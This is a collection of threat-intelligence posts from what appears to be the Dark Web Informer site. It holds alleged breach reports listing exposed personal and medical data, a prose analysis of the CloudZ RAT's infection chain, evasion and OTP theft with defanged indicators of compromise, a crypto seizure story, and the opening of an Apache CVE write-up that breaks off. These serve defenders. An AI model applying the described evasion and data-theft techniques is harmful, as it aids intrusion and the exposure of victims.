https://darkwebinformer.com/antel-tuid-digital-allegedly-breached-exposing-8gb-of-data-from-the-uruguayan-state-telecoms-e-government-platform/ Last updated: 2026-05-07T15:22:01.000Z Breach Report · Uruguay # Antel TuID Digital Allegedly Breached Exposing 8GB of Data From the Uruguayan State Telecom’s E-Government Platform A threat actor claims to have compromised TuID Digital, the digital identity platform operated by Uruguayan state-owned telecom Antel, by obtaining the API key stored alongside internal files on Antel’s server backend. They state they could view and modify the data of any citizen who completed an online procedure and effectively gain control over thousands of digital identities, releasing 8GB of internal files plus a sample of records on persons of interest including police, government officials, journalists, and lawyers. Post details Actor(s)LaPampaLeaks SectorGovernment / Telecommunications (state-owned) TypeData Leak with API key disclosure Format8GB of internal files plus JSON API responses PriceFree CountryUruguay Date06/05/2026 Compromised data - CI (cédula de identidad) national ID - First names, last names, middle name, full name - Email address - Phone number, prefix, cellphone - Date of birth, gender - Latest update timestamp - Document type, serial number, country - Mail and cellphone validation flags - Security level and biometric validation status - Identity signature transactions (idSignIdentityTx) - Registration officer, revoked date, addresses - City contract sign, location, department - Identification expiry, registration authority - signIdentityLegalPersonDto, signIdentityEnterpriseDto - Accepted certificates, active PFCert, certificate issuance mode - Mail token, password hash flag, register info - Internal proposals, employee feedback, legal documents - Technological infrastructure works, small databases - Number portability records (Portabilidad numérica) - Antel backend and frontend documentation - TuID Digital API keys Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/872357862358923985928357923598325.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/872357862358923985928357923598325.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82357829586235987263587236598726598273597863.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82357829586235987263587236598726598273597863.png) [ ![Screenshot 3](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82357829586235987263587236598726598273597864.png) 03 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82357829586235987263587236598726598273597864.png) [ ![Screenshot 4](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82357829586235987263587236598726598273597865.png) 04 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82357829586235987263587236598726598273597865.png) [ ![Screenshot 5](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82357829586235987263587236598726598273597866.png) 05 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82357829586235987263587236598726598273597866.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Laboratorios CEFLO Allegedly Breached Exposing 21K Positive HIV, Syphilis, and COVID Test Results From the Mexican Lab URL: https://darkwebinformer.com/laboratorios-ceflo-allegedly-breached-exposing-21k-positive-hiv-syphilis-and-covid-test-results-from-the-mexican-lab/ Last updated: 2026-05-07T14:50:15.000Z Breach Report · Mexico # Laboratorios CEFLO Allegedly Breached Exposing 21K Positive HIV, Syphilis, and COVID Test Results From the Mexican Lab A threat actor describing themselves as specializing in “stealing medical data” claims to have breached Mexican clinical lab Laboratorios CEFLO, releasing the dataset for free out of stated retaliation after the lab allegedly ignored a paid pentest offer. The leak contains roughly 21,000 patient records flagged positive for HIV, syphilis (V.D.R.L.), COVID, and other tests, with samples showing full names, birth dates, and result types. Post details Actor(s)Alameda\_slim SectorHealthcare / Clinical laboratory TypeData Leak FormatCSV-style records PriceFree (reply or upgrade gated) Records\~21,000 positive results CountryMexico Date06/05/2026 Compromised data - Full names (nombre, apellidos) - Date of birth (fecha\_nacimiento) and age (edad) - Phone number (telefono) - Email (some) - Test date (fechaalta) and result capture date - Test type and abbreviation (HIV, V.D.R.L., etc.) - Result (positive/negative) - Internal IDs (id\_resultado, id\_perfil, id\_paciente, id\_usuario, id\_examen) - Status, comments, analyzer, autovalidation flags - Recipient/destination data (destinatarios) Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/93278498746198256923857698127649873698712.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/93278498746198256923857698127649873698712.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/93278498746198256923857698127649873698713.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/93278498746198256923857698127649873698713.png) ### Belgian Sports/Fitness Chain Allegedly Breached Exposing 105K Customer Records With IBAN Data URL: https://darkwebinformer.com/belgian-sports-fitness-chain-allegedly-breached-exposing-105k-customer-records-with-iban-data/ Last updated: 2026-05-07T15:11:48.000Z Breach Report · Belgium # Belgian Sports/Fitness Chain Allegedly Breached Exposing 105K Customer Records With IBAN Data A threat actor claims to be selling a customer database from a Belgian sports/fitness business (gym branding visible in the post as “ANIMO”), advertising it as containing 105,000 customers with full IBAN banking details. The seller is offering tiered pricing with $90 per 1,000 customers or $8,500 for the full dataset. Post details Actor(s)shabat SectorSports / Fitness (gyms) TypeData Sale FormatJSON Price$90 per 1K customers / $8,500 for full database Records\~105,000 CountryBelgium Date06/05/2026 Compromised data - Customer ID and customer number - First name, last name, date of birth, age, gender - Customer status and card number - Street, house number, ZIP, city - Email address - Private and mobile telephone numbers - Account amount and consumption credit balance - Later sale balance - Last check-in time - IBAN and BIC banking details - Account holder name - Tax ID - Campaign name and image URL Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/138792459817264987569872356987231.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/138792459817264987569872356987231.png) ### MoreIdeas General Trading Allegedly Re-Leaked Exposing 787,217 Student Records From the Dubai EdTech Firm URL: https://darkwebinformer.com/moreideas-general-trading-allegedly-re-leaked-exposing-787-217-student-records-from-the-dubai-edtech-firm/ Last updated: 2026-05-06T23:54:03.000Z Breach Report · United Arab Emirates # MoreIdeas General Trading Allegedly Re-Leaked Exposing 787,217 Student Records From the Dubai EdTech Firm A threat actor claims to have re-dumped the moreideas.ae database, stating this version is “more juicy than before” and dating the breach to May 2026\. MoreIdeas General Trading LLC is described in the post as a Dubai-based company operating in education and educational technology. Post details Actor(s)fuckiewuckie SectorEducation / EdTech TypeData Re-leak FormatSQL INSERT statements PriceFree (reply-gated) Records787,217 students CountryUnited Arab Emirates (Dubai) Date06/05/2026 Compromised data - Internal IDs (id, pID) - Parent name (pName) and student name - Primary and secondary email - Primary and secondary mobile - Country, city, addresses 1/2/3 - Order count, active status - Entry/update timestamps and entry user - Parent ID proof - Lead ID, mobile code, school - Campaign, BFS type, language, nationality - Curriculum, promoter, promoter TL - Notes, comments, created date - Referral school, location, student, mobile, relation, notes - Style, status, discount, break time - Lead category, SMS sent flag - Sibling info and timestamps Screenshots [ ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/123578962938576298356928374568325981.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/123578962938576298356928374568325981.png) ### Indonesia’s Ministry of Energy and Mineral Resources (ESDM) Allegedly Leaked Exposing Fuel Oil Distributor Records URL: https://darkwebinformer.com/indonesias-ministry-of-energy-and-mineral-resources-esdm-allegedly-leaked-exposing-fuel-oil-distributor-records/ Last updated: 2026-05-06T23:22:03.000Z Breach Report · Indonesia # Indonesia’s Ministry of Energy and Mineral Resources (ESDM) allegedly leaked exposing fuel oil distributor records A threat actor claims to have leaked a database from Indonesia’s Ministry of Energy and Mineral Resources (Kementerian ESDM), specifically the list of distributors for general commercial business entities of fuel oil for the second semester of 2025\. The post includes a sample table of distributors with company identifiers and tax numbers, with a PDF attachment offered to complete the dataset. Post details Actor(s)MrLucxy SectorGovernment / Energy regulation TypeData Leak FormatPDF attachment with sample table PriceFree CountryIndonesia PeriodSecond semester 2025 Compromised data - Distributor company name (Nama Penyalur) - Office address (Alamat Kantor) - NIB / TDP business registration numbers - NPWP tax identification numbers - Facility address (Alamat Fasilitas) - City / regency (Kota / Kabupaten) - Province (Provinsi) Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/879235698726359872365987236589727890.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/879235698726359872365987236589727890.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/879235698726359872365987236589727891.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/879235698726359872365987236589727891.png) [ ![Screenshot 3](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/879235698726359872365987236589727892.png) 03 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/879235698726359872365987236589727892.png) ### Daily Dose of Dark Web Informer - May 6th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-6th-2026/ Last updated: 2026-05-06T22:25:50.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence 📰 [Palo Alto Networks Warns of Actively Exploited PAN-OS Zero-Day Granting Root Access](https://darkwebinformer.com/palo-alto-networks-warns-of-actively-exploited-pan-os-zero-day-granting-root-access/) FREE 📰 [Critical Apache HTTP/2 Double-Free Flaw Enables Denial-of-Service and Potential Remote Code Execution](https://darkwebinformer.com/critical-apache-http-2-double-free-flaw-enables-denial-of-service-and-potential-remote-code-execution/) FREE 📰 [52.3 Bitcoin and a Suburban Search Warrant: Inside One of Australia's Biggest Crypto Seizures](https://darkwebinformer.com/52-3-bitcoin-and-a-suburban-search-warrant-inside-one-of-australias-biggest-crypto-seizures/) FREE 📰 [CloudZ RAT: A Stealthy New Trojan Hijacks Microsoft Phone Link to Steal Your SMS OTPs](https://darkwebinformer.com/cloudz-rat-a-stealthy-new-trojan-hijacks-microsoft-phone-link-to-steal-your-sms-otps/) FREE X/Twitter Updates ❗️ [TomodachiShare allegedly exposing 145K user accounts](https://x.com/DarkWebInformer/status/2052034556442648627?s=20) ❗️ [CAF (Caisse d'Allocations Familiales) allegedly breached exposing 22 million records](https://x.com/DarkWebInformer/status/2052036423843209395?s=20) ❗️ [KGI (http://kgi.com.hk) allegedly breached exposing 5M+ Hong Kong stock investor records](https://x.com/DarkWebInformer/status/2052042818944692402?s=20) ❗️ [Croesus (http://croesus.com) allegedly breached exposing 19,220 Canadian user records](https://x.com/DarkWebInformer/status/2052044608901689515?s=20) ❗️ [IUNGO Cloud (http://iungo.cloud) allegedly leaked exposing 21M corporate email addresses](https://x.com/DarkWebInformer/status/2052046375324418422?s=20) ❗️ [Määrdekeskus allegedly breached exposing customer and affiliate records from the Estonian lubricant retailer](https://x.com/DarkWebInformer/status/2052049015496147088?s=20) ❗️ [Instituto Consorcio Clavijero allegedly breached exposing 39,000 student records from the Veracruz education platform](https://x.com/DarkWebInformer/status/2052053936471773675?s=20) ❗️ [VIP Buenaventura allegedly leaked exposing 70,000 user records from the Colombian taxi app](https://x.com/DarkWebInformer/status/2052058776761409962?s=20) ❗️ [CEMIG allegedly breached exposing a 190GB Watson instance dump from the Brazilian energy utility](https://x.com/DarkWebInformer/status/2052061197516542368?s=20) ❗️ 💡 [I am moving up the release of the IOC Live Feed and History Feed to tomorrow instead of Friday. There will be 30-60 minutes of downtime. I will let everyone know before the cutover.](https://x.com/DarkWebInformer/status/2052079901671329953?s=20) ❗️ [Over 24 million Mexican civilian records allegedly leaked across two combined files](https://x.com/DarkWebInformer/status/2052083883697480152?s=20) 💡 [XForums is currently offline.](https://x.com/DarkWebInformer/status/2052085795066933478?s=20) 💡 [The Register is reporting that Arctic Wolf has laid off 250 employees to save money for AI](https://x.com/DarkWebInformer/status/2052091906792780238?s=20) ❗️ [Nuclei template for fingerprinting the PAN-OS CVE-2026-0300 zero-day:](https://x.com/DarkWebInformer/status/2052100445921792056?s=20) ❗️ [1/2 Argentine government and http://crónica.com allegedly breached exposing 80M credentials and sensitive admin data](https://x.com/DarkWebInformer/status/2052104641404383527?s=20) 💡 [Anthropic has agreed to a partnership with @SpaceX that will increase their compute capacity.](https://x.com/DarkWebInformer/status/2052105749921222962?s=20) ❗️ [CACPE Pastaza allegedly breached exposing 18 million Ecuadorian civil registry records via an unprotected API](https://x.com/DarkWebInformer/status/2052109969571434776?s=20) ❗️ [Nimrod Stealer source code allegedly shared on a hacking forum for credential and browser data theft](https://x.com/DarkWebInformer/status/2052113077278306781?s=20) 💡 [I am currently building the historical feed...](https://x.com/DarkWebInformer/status/2052119283958689949?s=20) ❗️ [SAFEPAY Ransomware Claims 9 Victims](https://x.com/DarkWebInformer/status/2052124591884300308?s=20) ❗️ [NRJ Mobile allegedly leaked exposing 266K customer records from the French MVNO](https://x.com/DarkWebInformer/status/2052129105739415793?s=20) ❗️ [TransmiteNota allegedly leaked exposing 20 million records from the Brazilian e-invoicing platform](https://x.com/DarkWebInformer/status/2052138915554066677?s=20) ❗️ [Leroy Merlin France allegedly leaked exposing 367,462 loyalty program records](https://x.com/DarkWebInformer/status/2052140559670685815?s=20) ❗️ [Systemd Backdoor: A simple script to automate systemd backdoor](https://x.com/DarkWebInformer/status/2052142617744323003?s=20) ❗️ [Marlon Ferro, who went by the online handle "GothFerrari," has been sentenced to](https://x.com/DarkWebInformer/status/2052145592487366856?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### CloudZ RAT: A Stealthy New Trojan Hijacks Microsoft Phone Link to Steal Your SMS OTPs URL: https://darkwebinformer.com/cloudz-rat-a-stealthy-new-trojan-hijacks-microsoft-phone-link-to-steal-your-sms-otps/ Last updated: 2026-05-06T18:49:18.000Z Malware Threat Intel · 06 May 2026 · 18:22 UTC # CloudZ RAT abuses Microsoft Phone Link to steal SMS OTPs and mobile notifications A newly disclosed remote access trojan turns a built-in Windows feature into a credential-harvesting weapon, and it never has to touch your phone to steal codes meant for it. **Discovered by** Cisco Talos **Active since** January 2026 **Attribution** Unknown Researchers at [Cisco Talos](https://blog.talosintelligence.com/cloudz-pheno-infostealer/) have detailed an ongoing intrusion, active since at least January 2026, in which an unidentified threat actor is deploying a modular .NET-based RAT called **CloudZ**, paired with a previously undocumented plugin known as **Pheno**. Together, the two abuse Microsoft's Phone Link application to siphon off SMS messages, one-time passwords (OTPs), and authenticator app notifications directly from compromised Windows machines. The campaign has been independently covered by [The Hacker News](https://thehackernews.com/2026/05/windows-phone-link-exploited-by-cloudz.html), [BleepingComputer](https://www.bleepingcomputer.com/news/security/cloudz-malware-abuses-microsoft-phone-link-to-steal-sms-and-otps/), [Infosecurity Magazine](https://www.infosecurity-magazine.com/news/cloudz-rat-pheno-phone-link-otp/), and [CSO Online](https://www.csoonline.com/article/4167092/stealthy-malware-abuses-microsoft-phone-link-to-siphon-sms-otps-from-enterprise-pcs.html), among others. ## Why this attack matters Microsoft Phone Link (formerly *Your Phone*) is a legitimate Windows 10/11 sync utility that bridges a PC to an Android or iOS device over Wi-Fi and Bluetooth. Once paired, it mirrors text messages, notifications, and calls onto the desktop and stores synchronized data locally in SQLite databases such as PhoneExperiences-\*.db. That convenience is exactly what the attackers exploit. Rather than breaching the phone itself (a much harder problem), CloudZ targets the PC-side artifacts of an already-trusted bridge. As Talos researchers Alex Karkins and Chetan Raghuprasad put it in their [analysis](https://blog.talosintelligence.com/cloudz-pheno-infostealer/), the goal was stealing victims' credentials and potentially OTPs, without ever deploying malware on the phone. The implication is significant for enterprise defenders: controls focused on mobile device security can be sidestepped entirely if the linked Windows endpoint is compromised. SMS-based and even some app-based MFA flows that rely on push notifications become exposed the moment the desktop is. ## The infection chain According to [Talos](https://blog.talosintelligence.com/cloudz-pheno-infostealer/) and corroborating reporting from [BleepingComputer](https://www.bleepingcomputer.com/news/security/cloudz-malware-abuses-microsoft-phone-link-to-steal-sms-and-otps/), the attack unfolds in several stages: 1. **Initial access (unknown vector).** Talos has not yet determined how victims are first compromised, but the foothold leads to execution of a fake ConnectWise ScreenConnect update, typically named systemupdates.exe. 2. **Rust-compiled dropper.** This binary establishes persistence by spawning a hidden PowerShell script that creates a scheduled task (named SystemWindowsApis) to run on system startup. 3. **.NET intermediate loader.** Disguised as a text file in a system directory, the loader executes via the legitimate Windows binary regasm.exe under the SYSTEM account. It also performs heavy anti-analysis checks: timing-based sandbox evasion, enumeration of analysis tools (Wireshark, Fiddler, Procmon, Sysmon), and searches for VM/sandbox indicators in the system path and hostname, as documented by [Infosecurity Magazine](https://www.infosecurity-magazine.com/news/cloudz-rat-pheno-phone-link-otp/). 4. **CloudZ RAT deployment.** Compiled in mid-January 2026 and obfuscated with ConfuserEx, CloudZ decrypts an embedded configuration, opens an encrypted TCP socket to its C2 server, and enters command dispatcher mode. It pulls additional configuration from attacker-controlled Cloudflare Workers domains and from Pastebin pages tagged with the handler HELLOHIALL, while rotating through three hardcoded user-agent strings and anti-caching headers to blend HTTP traffic with normal browser activity. ## What CloudZ can do Beyond Phone Link abuse, CloudZ is a fairly capable modular RAT. According to [Talos](https://blog.talosintelligence.com/cloudz-pheno-infostealer/) and [BleepingComputer](https://www.bleepingcomputer.com/news/security/cloudz-malware-abuses-microsoft-phone-link-to-steal-sms-and-otps/), it supports browser data theft, host system profiling, file management (delete, download, write), and arbitrary command execution. It downloads its plugins using a three-method fallback (first attempting curl, then PowerShell's Invoke-WebRequest, and finally falling back to the bitsadmin LOLBin) to maximize the chance a payload lands successfully. ## The Pheno plugin Pheno is the part of the toolkit that turns a generic RAT infection into an OTP-interception capability. Per the [Talos report](https://blog.talosintelligence.com/cloudz-pheno-infostealer/), the plugin scans every running process for keywords associated with Phone Link (YourPhone, PhoneExperienceHost, and Link to Windows) and writes the results to a staging folder. It then performs a secondary check: it reads back its own output files looking for the case-insensitive keyword proxy. Phone Link uses a local proxy connection to relay traffic between the PC and the paired phone, so the presence of "proxy" in a previous run's output indicates an active session. When found, Pheno writes Maybe connected to its output file. CloudZ then reads that staging data and exfiltrates it to the C2 server. With a confirmed Phone Link connection, the operator can then go after the SQLite database file (PhoneExperiences-\*.db) where Phone Link locally caches synchronized SMS and notifications, and that's where authenticator app notifications and SMS-delivered OTPs live, as [CyberInsider](https://cyberinsider.com/cloudz-malware-hijacks-microsoft-phone-link-to-intercept-sms-and-otps/) notes in its writeup. ## Defensive recommendations The advice from Talos and the wider reporting is consistent: - **Move off SMS-based MFA.** It was already the weakest factor, and CloudZ is another reason to retire it. As [BleepingComputer](https://www.bleepingcomputer.com/news/security/cloudz-malware-abuses-microsoft-phone-link-to-steal-sms-and-otps/) recommends, prefer phishing-resistant options like FIDO2 hardware keys, or authenticator apps that don't push codes to a paired desktop. - **Audit Phone Link usage.** [CyberInsider](https://cyberinsider.com/cloudz-malware-hijacks-microsoft-phone-link-to-intercept-sms-and-otps/) suggests reviewing whether Phone Link is actually needed in your environment, and disabling it if not. - **Hunt for the IOCs below.** Talos has published [ClamAV signatures, Snort rules, and IOCs](https://github.com/Cisco-Talos/IOCs/tree/main/2026/05) on GitHub. - **Watch for suspicious scheduled tasks** created under SYSTEM that invoke regasm.exe against unusual file paths, and for systemupdates.exe masquerading as ScreenConnect. Talos has not attributed the campaign to any known threat actor. ## Indicators of Compromise Sourced from the [Cisco Talos IOC repository](https://github.com/Cisco-Talos/IOCs/blob/main/2026/05/cloudz-pheno-infostealer.txt). ### File hashes (SHA-256) | Rusty dropper | 65fcd965040fabeb6f092df0a4b6856125018bb3b6a1876342da458139f77dac | | ------------- | ---------------------------------------------------------------- | | .NET loader | ed5de036edbbda52ab0049d2163607038d38a49404a46b6bcfc4bac26b743832 | | .NET loader | 24398b75be2645e6c695e529e62e60deb418143a4bbea13c561d3c361419eb54 | | CloudZ RAT | 5b7284bcf30569ae400e416a62391720cc9081e6047f15816f9d1a04a06eb321 | | Pheno plugin | 33af554562176eff34598a839051b8e91692b0305edfdbb4d8eb9df0103ffd98 | ### Staging URLs - hxxps://calm-wildflower-1349\[.\]hellohiall\[.\]workers\[.\]dev/ - hxxps://orange-cell-1353\[.\]hellohiall\[.\]workers\[.\]dev/pheno\[.\]exe - hxxps://round-cherry-4418\[.\]hellohiall\[.\]workers\[.\]dev/?t=1769729309 - hxxps://pastebin\[.\]com/raw/8pYAgF0Z?t=1771833517 - hxxps://pastebin\[.\]com/EBrpRiFi - hxxps://pastebin\[.\]com/ikjGHALD - hxxps://pastebin\[.\]com/3jKbe7rN - hxxps://pastebin\[.\]com/NUrZTmDn - hxxps://pastebin\[.\]com/RKJcXMAm - hxxps://pastebin\[.\]com/yUkbaBH3 ### Domains - calm-wildflower-1349\[.\]hellohiall\[.\]workers\[.\]dev - orange-cell-1353\[.\]hellohiall\[.\]workers\[.\]dev - round-cherry-4418\[.\]hellohiall\[.\]workers\[.\]dev ### IP addresses - 185\[.\]196\[.\]10\[.\]136 // C2 server ## References 1. Cisco Talos[CloudZ RAT potentially steals OTP messages using Pheno plugin](https://blog.talosintelligence.com/cloudz-pheno-infostealer/) 2. Cisco Talos[IOC repository (GitHub)](https://github.com/Cisco-Talos/IOCs/blob/main/2026/05/cloudz-pheno-infostealer.txt) 3. The Hacker News[Windows Phone Link Exploited by CloudZ RAT to Steal Credentials and OTPs](https://thehackernews.com/2026/05/windows-phone-link-exploited-by-cloudz.html) 4. BleepingComputer[CloudZ malware abuses Microsoft Phone Link to steal SMS and OTPs](https://www.bleepingcomputer.com/news/security/cloudz-malware-abuses-microsoft-phone-link-to-steal-sms-and-otps/) 5. Infosecurity Mag[CloudZ Malware Abuses Phone Link to Steal SMS OTPs](https://www.infosecurity-magazine.com/news/cloudz-rat-pheno-phone-link-otp/) 6. CSO Online[Stealthy malware abuses Microsoft Phone Link to siphon SMS OTPs from enterprise PCs](https://www.csoonline.com/article/4167092/stealthy-malware-abuses-microsoft-phone-link-to-siphon-sms-otps-from-enterprise-pcs.html) 7. CyberInsider[CloudZ malware hijacks Microsoft Phone Link to intercept SMS and OTPs](https://cyberinsider.com/cloudz-malware-hijacks-microsoft-phone-link-to-intercept-sms-and-otps/) ### 52.3 Bitcoin and a Suburban Search Warrant: Inside One of Australia's Biggest Crypto Seizures URL: https://darkwebinformer.com/52-3-bitcoin-and-a-suburban-search-warrant-inside-one-of-australias-biggest-crypto-seizures/ Last updated: 2026-05-06T23:55:47.000Z When most people picture a darknet drug bust, they imagine cinematic scenes of hooded figures and underground servers. The reality, as a New South Wales Police operation revealed this week, looks a lot more mundane: a quiet street in Sydney's southwest, a 6:40am knock on the door, and a hard drive holding the keys to a multimillion-dollar bitcoin wallet. On Monday 4 May 2026, Cybercrime Squad detectives, backed by the Public Order and Riot Squad, executed a search warrant at a home in Ingleburn. They walked out with electronic devices containing 52.3 bitcoin, worth roughly **$5.7 million** at the time of seizure. According to [NSW Police](https://www.police.nsw.gov.au/), it's one of the largest cryptocurrency seizures in Australian history. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/5_7_million_seizure_2.webp) ## A 15-month trail The Ingleburn raid wasn't a lucky break. It was the culmination of **Strike Force Andalusia**, [established in September 2024](https://www.police.nsw.gov.au/) to investigate a substantial bitcoin wallet that detectives suspected held proceeds from darknet marketplace activity. The trail began on the NSW South Coast. In May 2025, strike force detectives executed a warrant at a home in Surfside, near Batemans Bay, where they seized electronic devices and around 7.2 grams of cocaine. Forensic analysis of those devices turned up a smaller stash of about $47,000 in cryptocurrency, and more importantly, leads pointing to two men, aged 39 and 41, who allegedly had access to a much larger wallet ([Inside State Government](https://www.insidestategovernment.com.au/nsw-police-seize-5-7-million-in-darknet-cryptocurrency/)). A 39-year-old man was arrested and charged at Batemans Bay with serious offences including dealing with the proceeds of crime over $5 million, supplying a prohibited drug, and failing to comply with a digital evidence access order. The 41-year-old was [separately charged](https://au.news.yahoo.com/57-million-discovery-in-suburban-home-in-major-australian-police-bust-one-of-the-biggest-044952512.html) in connection with an alleged crypto transfer of more than $100,000 and is due to face Campbelltown Local Court. What followed was nearly a year of further investigation, including wallet tracing, forensic work on seized devices, and the patient process of linking on-chain activity to real-world identities, before detectives moved on the Ingleburn property and recovered the bulk of the bitcoin ([Mirage News](https://www.miragenews.com/cybercrime-bust-detectives-seize-5-7m-in-crypto-1668096/)). ## "Not anonymous" The message from police was pointed. Detective Superintendent Matt Craft, who commands the State Crime Command's Cybercrime Squad, framed the seizure as a direct rebuttal to the persistent myth that darknet activity is untraceable. He said criminals on the darknet often believe they're beyond the reach of law enforcement, but the investigation shows otherwise, and described darknet marketplaces as a key enabler of serious criminal activity that detectives are actively targeting ([NSW Police statement](https://www.police.nsw.gov.au/)). It's a fair claim to make. Bitcoin's public ledger means every transaction is recorded forever, and forensic blockchain analysis has matured rapidly over the last decade. Combine that with the very ordinary mistakes people make, like reusing wallets, mixing personal and illicit activity, or leaving keys on devices that get seized in unrelated raids, and "anonymous" starts looking more like "anonymous until someone bothers to look." ## What this signals A few things stand out about this case beyond the headline number. First, the **patience** of the investigation. Fifteen months from strike force formation to the major seizure is a serious commitment of resources for a state-level cybercrime unit, and suggests NSW Police see darknet enforcement as worth the long game. Second, the **physical-digital handoff**. The case didn't crack because of some elegant blockchain exploit. It cracked because police walked into a house and took the devices. Operational security on the darknet often fails not in code but in the kitchen drawer. Third, the **timing of the asset**. Bitcoin seized at $5.7 million in May 2026 may be worth substantially more or less by the time matters resolve in court. Australian proceeds-of-crime law has had to evolve quickly to handle volatile digital assets, and cases like this will keep stress-testing those frameworks. ## What's next Strike Force Andalusia remains active. The 39-year-old is next due in Batemans Bay Local Court on 15 June 2026, and the 41-year-old is scheduled for Campbelltown Local Court next Wednesday. NSW Police have asked anyone with information about organised criminal activity to contact Crime Stoppers on 1800 333 000 or via [nsw.crimestoppers.com.au](https://nsw.crimestoppers.com.au/). For everyone else, the takeaway is straightforward: the romantic notion of an untouchable darknet economy is getting harder to defend. The wallet may live on the blockchain, but the person holding the keys still lives at an address. --- ## Sources - NSW Police Force, [Cybercrime Squad detectives seize $5.7 million in cryptocurrency following an investigation into darknet market dealings](https://www.police.nsw.gov.au/) - Inside State Government, [NSW Police seize $5.7 million in darknet cryptocurrency](https://www.insidestategovernment.com.au/nsw-police-seize-5-7-million-in-darknet-cryptocurrency/) - Yahoo News Australia, [$5.7 million discovery in suburban home in major Australian police bust: 'One of the biggest'](https://au.news.yahoo.com/57-million-discovery-in-suburban-home-in-major-australian-police-bust-one-of-the-biggest-044952512.html) - Mirage News, [Cybercrime Bust: Detectives Seize $5.7M in Crypto](https://www.miragenews.com/cybercrime-bust-detectives-seize-5-7m-in-crypto-1668096/) ### Critical Apache HTTP/2 Double-Free Flaw Enables Denial-of-Service and Potential Remote Code Execution URL: https://darkwebinformer.com/critical-apache-http-2-double-free-flaw-enables-denial-of-service-and-potential-remote-code-execution/ Last updated: 2026-05-06T16:42:06.000Z ⚠ Critical - Double Free / RCE CVE CVE-2026-23918 CVSS 8.8 High Type Memory Corruption Patch Available - 2.4.67 ## Vulnerability Overview The Apache Software Foundation has [released security updates](https://securityaffairs.com/191759/security/apache-fixes-critical-http-2-double-free-flaw-cve-2026-23918-enabling-rce.html) to address several vulnerabilities in Apache HTTP Server, including a critical double-free memory corruption flaw that can lead to denial-of-service and potentially remote code execution. Tracked as **CVE-2026-23918** with a CVSS score of 8.8, the vulnerability resides in the mod\_http2 module and affects Apache HTTP Server version 2.4.66. The flaw was discovered by Striga.ai co-founder **Bartlomiej Dmitruk** and ISEC.pl researcher **Stanislaw Strzalkowski**, who [told The Hacker News](https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html) that the severity of 